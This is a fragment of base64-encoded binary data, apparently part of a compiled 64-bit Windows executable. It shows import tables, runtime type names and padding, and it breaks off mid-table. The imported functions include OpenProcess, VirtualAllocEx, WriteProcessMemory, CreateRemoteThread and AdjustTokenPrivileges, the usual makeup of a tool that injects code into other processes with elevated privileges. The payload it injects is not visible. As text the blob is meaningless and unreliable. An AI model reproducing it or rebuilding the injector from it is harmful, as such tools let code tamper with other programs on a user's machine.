AAABGQoAGTQWABmyFfAT4BHQD8ANcAxgC1ABFQkAFWIR8A/gDdALwAlwCGAHUAYwAAABEQkAEWIN8AvgCdAHwAVwBGADUAIwAAARGwoAG2QMABs0CwAbMhfwFeAT0BHAD3DIqwAAAQAAAI0AAgC/AAIA2sMCAAAAAAABGQoAGXQOABlkDQAZNAwAGXIV8BPgEcABHgoAHmQTAB40EgAekhfwFeATwBFwEFAZLQkAFwESAAvwCeAHwAVwBGADMAJQAAAktQIA0EUDAIoAAAD/////CMQCAAwGAgAAAAAAsAgCAP////8ZJAkAEgEaAAvwCeAHwAVwBGADUAIwAADkhgAAwAAAABktDUUfxBUAG3QUABdkEwATNBIAD0MK0gbwBOACUAAA5IYAAGAAAAAZLQ01H3QUABtkEwAXNBIAEzMOsgrwCOAG0ATAAlAAAOSGAABQAAAAAQ8GAA9kEQAPNBAAD9ILcBktDVUfdBQAG2QTABc0EgATUw6yCvAI4AbQBMACUAAA5IYAAFgAAAAREQgAETQRABFyDeAL0AnAB3AGYMirAAACAAAAVRQCABMVAgAUxAIAAAAAAIUVAgCdFQIAFMQCAAAAAAARDwQADzQGAA8yC3DIqwAAAQAAALYSAgDMEgIAw8ICAAAAAAABBgIABhICMAETBQATaAgADwESAARQAAABDgMADmgGAATiAAABBgMABjQCAAZwAAABGAoAGGQOABhUDQAYNAwAGHIU8BLgEHABBgIABnICMAEcCgAcNBQAHLIV8BPgEdAPwA1wDGALUBkrBwAadFYAGjRVABoBUgALUAAA5IYAAIACAAAZIwoAFDQSABRyEPAO4AzQCsAIcAdgBlDkhgAAOAAAABEPBgAPZAgADzQHAA8yC3DIqwAAAQAAACkuAgB4LgIANcQCAAAAAAABGQYAGTQMABlyEnARYBBQGSsHABpk9AAaNPMAGgHwAAtQAADkhgAAcAcAABEPBAAPNAYADzILcMirAAABAAAAlScCACApAgDDwgIAAAAAAAEYCgAYNBAAGFIU8BLgENAOwAxwC2AKUAEVCAAVdAoAFWQJABU0CAAVUhHgARQGABRkBwAUNAYAFDIQcBEVCAAVdAoAFWQJABU0CAAVUhHwyKsAAAEAAAD/OAIARjkCAGLDAgAAAAAAAR8MAB90EAAfZA8AHzQOAB9yGPAW4BTQEsAQUAEOAgAOMgowARgGABhUBwAYNAYAGDIUYBEKBAAKNAYACjIGcMirAAABAAAApU4CALdOAgBOxAIAAAAAAAEdDAAddA0AHWQMAB1UCwAdNAoAHVIZ8BfgFcAZJwkAFVQeABU0HQAVARgADtAMcAtgAADkhgAAsAAAABkkBwASZCoAEjQpABIBJgALcAAA5IYAACABAAAZHwUADTQhAA0BHgAGcAAA5IYAAOAAAAAZFQIABnICMOSGAAA4AAAAGSAIABJyC/AJ4AfABXAEYAMwAlDkhgAAMAAAABknCQAVVCoAFTQpABUBJAAO4AxwC2AAAOSGAAAQAQAAGSQHABJkKAASNCcAEgEkAAtwAADkhgAAEAEAABkpCQAXZCkAF1QoABc0JwAXASQAEHAAAOSGAAAQAQAAARcKABdUDAAXNAsAFzIT8BHgD9ANwAtwGSsJABoB/gAL8AngB8AFcARgAzACUAAA5IYAAOAHAAABFAgAFGQQABRUDwAUNA4AFLIQcAEcDAAcZA8AHFQOABw0DQAcUhjwFuAU0BLAEHAZJQoAFzQYABfSEPAO4AzQCsAIcAdgBlDkhgAAaAAAAAEjDQAjdCgAI2QnACM0JgAjASAAGPAW4BTQEsAQUAAAAAAAAAEEAQAEAgAAAQkBAAlCAAAZIwoAFDQSABRyEPAO4AzQCsAIcAdgBlDkhgAAMAAAAAEPBgAPdAQACmQDAAU0AgABCAIACJIEMBkmCQAYaA4AFAEeAAngB3AGYAUwBFAAAOSGAADQAAAAAQkBAAmiAAAZHwUADQGKAAbgBNACwAAA5IYAABAEAAAhKAoAKPSFACB0hgAYZIcAEFSIAAg0iQDAkAIAG5ECAOj4AwAhAAAAwJACABuRAgDo+AMAAQsFAAtkAwALNAIAC3AAAAEKBAAKNAoACnIGcAEfCwAfdBoAH2QZAB80GAAfARQAFPAS4BBQAAABHQwAHXQPAB1kDgAdVA0AHTQMAB1yGfAX4BXAGR8IABA0DwAQcgzwCuAIcAdgBlDkhgAAMAAAAAAAAAABCgMACmgCAASiAAAZJwtVGVMUAREADfAL4AnQB8AFcARgAzACUAAA5IYAAHgAAAAJFAgAFGQKABQ0CQAUMhDwDuAMwMirAAABAAAAErICABuyAgCUwwIAG7ICAAELAwALaAUAB8IAAAkKBAAKNAYACjIGcMirAAABAAAALbQCAGC0AgBwxAIAYLQCAAEOAQAOQgAAAAAAAAAAAADQEgAAAAAAAGD6AwAAAAAAAAAAAAAAAAAAAAAAAgAAACD9AwDI/QMAAAAAAAAAAAAAAAAAAAAAADAcBAAAAAAA/////wAAAAAYAAAAkFsAAAAAAAAAAAAAAAAAAAAAAADQEgAAAAAAAMD6AwAAAAAAAAAAAAAAAAAAAAAAAwAAAOD6AwB4+gMAyP0DAAAAAAAAAAAAAAAAAAAAAAAAAAAAWBwEAAAAAAD/////AAAAABgAAAAMWwAAAAAAAAAAAAAAAAAAAAAAANASAAAAAAAAKPsDAAAAAAAAAAAAAAAAAAAAAAADAAAASPsDAHj6AwDI/QMAAAAAAAAAAAAAAAAAAAAAAAAAAACAHAQAAAAAAP////8AAAAAGAAAAMxbAAAAAAAAAAAAAAAAAAAAAAAA0BIAAAAAAACQ+wMAAAAAAAAAAAAAAAAAAAAAAAIAAADQ/AMAyP0DAAAAAAAAAAAAAAAAAAAAAADQEgAAAAAAAMj7AwAAAAAAAAAAAAAAAAAAAAAAAgAAAOD7AwDI/QMAAAAAAAAAAAAAAAAAAAAAAKgcBAAAAAAA/////wAAAAAYAAAAnNAAAAAAAAAAAAAAAAAAAAMAAACo/AMAIP0DAMj9AwAAAAAAAAAAAAAAAAAAAAAAAgAAAPj8AwDI/QMAAAAAAAAAAAAAAAAAAAAAAFAdBAAAAAAA/////wAAAAAoAAAAYBcAAAAAAAAAAAAAAAAAAAAAAADQEgAAAAAAACj8AwAAAAAAAAAAAAAAAAAAAAAAAAAAANASAAAAAAAAcP0DAAAAAAAAAAAAAAAAAAAAAAAAAAAA8B0EAAAAAAD/////AAAAABgAAABAEwAAAAAAAAAAAAAAAAAAAAAAAAAdBAAAAAAA/////wAAAAAYAAAA4BMAAAAAAAAAAAAAAAAAAAAAAAB4HQQAAAAAAP////8AAAAAGAAAACAZAAAAAAAAAAAAAAAAAAAQAAAAKB0EAAAAAAD/////AAAAABgAAACAEwAAAAAAAAAAAAAAAAAAAAAAAKAdBAAAAAAA/////wAAAAAoAAAAwBcAAAAAAAAAAAAAAAAAAAUAAACg/QMAQPwDAEj9AwDQ/AMAyP0DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQHAQAAAAAAP////8AAAAAKAAAAOAeAAAAAAAAAAAAAAAAAAAAAAAAyB0EAAAAAAD/////AAAAABgAAAAgEgAAAAAAAAAAAAAAAAAAAAAAANASAAAAAAAACPwDAAAAAAAAAAAAAAAAAGj+AwAAAAAAAAAAABICBAAg0AIASP4DAAAAAAAAAAAAZAIEAADQAgAAAAAAAAAAAAAAAAAAAAAAAAAAADQCBAAAAAAAIAIEAAAAAABMAgQAAAAAAAAAAAAAAAAAjgEEAAAAAACWAQQAAAAAAKYBBAAAAAAAtAEEAAAAAACAAQQAAAAAANgBBAAAAAAA7AEEAAAAAAACAgQAAAAAABQIBAAAAAAAagEEAAAAAABWAQQAAAAAAMYBBAAAAAAAQAEEAAAAAAByAgQAAAAAAIgCBAAAAAAAoAIEAAAAAAC4AgQAAAAAANYCBAAAAAAA7gIEAAAAAAD+AgQAAAAAAA4DBAAAAAAAJAMEAAAAAAA0AwQAAAAAAEYDBAAAAAAAUgMEAAAAAABmAwQAAAAAAIADBAAAAAAAlAMEAAAAAACwAwQAAAAAAM4DBAAAAAAA4gMEAAAAAAD+AwQAAAAAABgEBAAAAAAALgQEAAAAAABEBAQAAAAAAF4EBAAAAAAAdAQEAAAAAACIBAQAAAAAAJoEBAAAAAAAqAQEAAAAAAC8BAQAAAAAAM4EBAAAAAAA3gQEAAAAAAAGBQQAAAAAABIFBAAAAAAAIAUEAAAAAAAuBQQAAAAAADgFBAAAAAAARgUEAAAAAABYBQQAAAAAAGgFBAAAAAAAdAUEAAAAAACKBQQAAAAAAJgFBAAAAAAArgUEAAAAAADABQQAAAAAANIFBAAAAAAA3gUEAAAAAADqBQQAAAAAAPwFBAAAAAAADAYEAAAAAAAeBgQAAAAAAC4GBAAAAAAARAYEAAAAAABaBgQAAAAAAGgGBAAAAAAAfgYEAAAAAACQBgQAAAAAAKgGBAAAAAAAvAYEAAAAAADSBgQAAAAAAOQGBAAAAAAA8AYEAAAAAAAABwQAAAAAABQHBAAAAAAAJAcEAAAAAAAyBwQAAAAAAD4HBAAAAAAAUgcEAAAAAABiBwQAAAAAAHQHBAAAAAAAfgcEAAAAAACKBwQAAAAAAKQHBAAAAAAAvgcEAAAAAADYBwQAAAAAAOgHBAAAAAAA+gcEAAAAAAAGCAQAAAAAACQIBAAAAAAAAAAAAAAAAAAuBldyaXRlUHJvY2Vzc01lbW9yeQAAIAJHZXRDdXJyZW50UHJvY2VzcwDqBVdhaXRGb3JTaW5nbGVPYmplY3QAEgRPcGVuUHJvY2VzcwCPBVNsZWVwAGoCR2V0TGFzdEVycm9yAACJAENsb3NlSGFuZGxlALgCR2V0UHJvY0FkZHJlc3MAANoFVmlydHVhbEFsbG9jRXgAAIECR2V0TW9kdWxlSGFuZGxlVwAA6gBDcmVhdGVSZW1vdGVUaHJlYWQAAN0FVmlydHVhbEZyZWVFeABLRVJORUwzMi5kbGwAABUCT3BlblByb2Nlc3NUb2tlbgAAHwBBZGp1c3RUb2tlblByaXZpbGVnZXMArwFMb29rdXBQcml2aWxlZ2VWYWx1ZVcAQURWQVBJMzIuZGxsAAARBldpZGVDaGFyVG9NdWx0aUJ5dGUAOAFFbnRlckNyaXRpY2FsU2VjdGlvbgAAxANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAbANJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uRXgAFAFEZWxldGVDcml0aWNhbFNlY3Rpb24ANAFFbmNvZGVQb2ludGVyAA0BRGVjb2RlUG9pbnRlcgD2A011bHRpQnl0ZVRvV2lkZUNoYXIAtwNMQ01hcFN0cmluZ0V4AOECR2V0U3RyaW5nVHlwZVcAAMoBR2V0Q1BJbmZvANUEUnRsQ2FwdHVyZUNvbnRleHQA3ARSdGxMb29rdXBGdW5jdGlvbkVudHJ5AADjBFJ0bFZpcnR1YWxVbndpbmQAAMAFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAB/BVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgCeBVRlcm1pbmF0ZVByb2Nlc3MAAIwDSXNQcm9jZXNzb3JGZWF0dXJlUHJlc2VudABSBFF1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyACECR2V0Q3VycmVudFByb2Nlc3NJZAAlAkdldEN1cnJlbnRUaHJlYWRJZAAA8wJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBvA0luaXRpYWxpemVTTGlzdEhlYWQAhQNJc0RlYnVnZ2VyUHJlc2VudADaAkdldFN0YXJ0dXBJbmZvVwDiBFJ0bFVud2luZEV4AN4EUnRsUGNUb0ZpbGVIZWFkZXIAaARSYWlzZUV4Y2VwdGlvbgAAQQVTZXRMYXN0RXJyb3IAAGsDSW5pdGlhbGl6ZUNyaXRpY2FsU2VjdGlvbkFuZFNwaW5Db3VudACwBVRsc0FsbG9jAACyBVRsc0dldFZhbHVlALMFVGxzU2V0VmFsdWUAsQVUbHNGcmVlALQBRnJlZUxpYnJhcnkAygNMb2FkTGlicmFyeUV4VwAA3AJHZXRTdGRIYW5kbGUAACUGV3JpdGVGaWxlAH0CR2V0TW9kdWxlRmlsZU5hbWVXAABnAUV4aXRQcm9jZXNzAIACR2V0TW9kdWxlSGFuZGxlRXhXAADfAUdldENvbW1hbmRMaW5lQQDgAUdldENvbW1hbmRMaW5lVwBRA0hlYXBBbGxvYwBVA0hlYXBGcmVlAACeAENvbXBhcmVTdHJpbmdXAAC4A0xDTWFwU3RyaW5nVwAAbgJHZXRMb2NhbGVJbmZvVwAAlANJc1ZhbGlkTG9jYWxlAB4DR2V0VXNlckRlZmF1bHRMQ0lEAABcAUVudW1TeXN0ZW1Mb2NhbGVzVwAAWAJHZXRGaWxlVHlwZQBGAkdldEV4aXRDb2RlUHJvY2VzcwAA6ABDcmVhdGVQcm9jZXNzVwAATAJHZXRGaWxlQXR0cmlidXRlc0V4VwAAqAFGbHVzaEZpbGVCdWZmZXJzAAAJAkdldENvbnNvbGVPdXRwdXRDUAAABQJHZXRDb25zb2xlTW9kZQAAeQRSZWFkRmlsZQAAVgJHZXRGaWxlU2l6ZUV4ADMFU2V0RmlsZVBvaW50ZXJFeAAAdgRSZWFkQ29uc29sZVcAAFgDSGVhcFJlQWxsb2MAfgFGaW5kQ2xvc2UAhAFGaW5kRmlyc3RGaWxlRXhXAACVAUZpbmROZXh0RmlsZVcAkgNJc1ZhbGlkQ29kZVBhZ2UAuwFHZXRBQ1AAAKECR2V0T0VNQ1AAAEECR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAswFGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwAkBVNldEVudmlyb25tZW50VmFyaWFibGVXAFsFU2V0U3RkSGFuZGxlAAC+AkdldFByb2Nlc3NIZWFwAABaA0hlYXBTaXplAADOAENyZWF0ZUZpbGVXACQGV3JpdGVDb25zb2xlVwDhBFJ0bFVud2luZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8BAAAACgAAAAAAAAD/////AAAAADKi3y2ZKwAAzV0g0mbU//91mAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAgAAAAAAAAAAAIAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIgAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBIEQAEAAABkLgRAAQAAAGQuBEABAAAAZC4EQAEAAABkLgRAAQAAAGQuBEABAAAAZC4EQAEAAABkLgRAAQAAAGQuBEABAAAAZC4EQAEAAAB/f39/f39/fxQSBEABAAAAaC4EQAEAAABoLgRAAQAAAGguBEABAAAAaC4EQAEAAABoLgRAAQAAAGguBEABAAAAaC4EQAEAAABwEQRAAQAAAC4AAAAuAAAAUAIDQAEAAABSBwNAAQAAAAwAAAAIAAAAAgAAAAAAAAAAAAAAAAAAAFQHA0ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAIAACgoKAAAAAAAAAAAAAAD/////AAAAAFACA0ABAAAAAQAAAAAAAAABAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgUBEABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBQEQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIFARAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgUBEABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBQEQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcBEEQAEAAAAAAAAAAAAAAAAAAAAAAAAA0AQDQAEAAABQBgNAAQAAAIA8A0ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoBIEQAEAAADQFgRAAQAAAEMAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAgICAgICAgICAgICAgICAgMDAwMDAwMDAAAAAAAAAAD+////AAAAAAAA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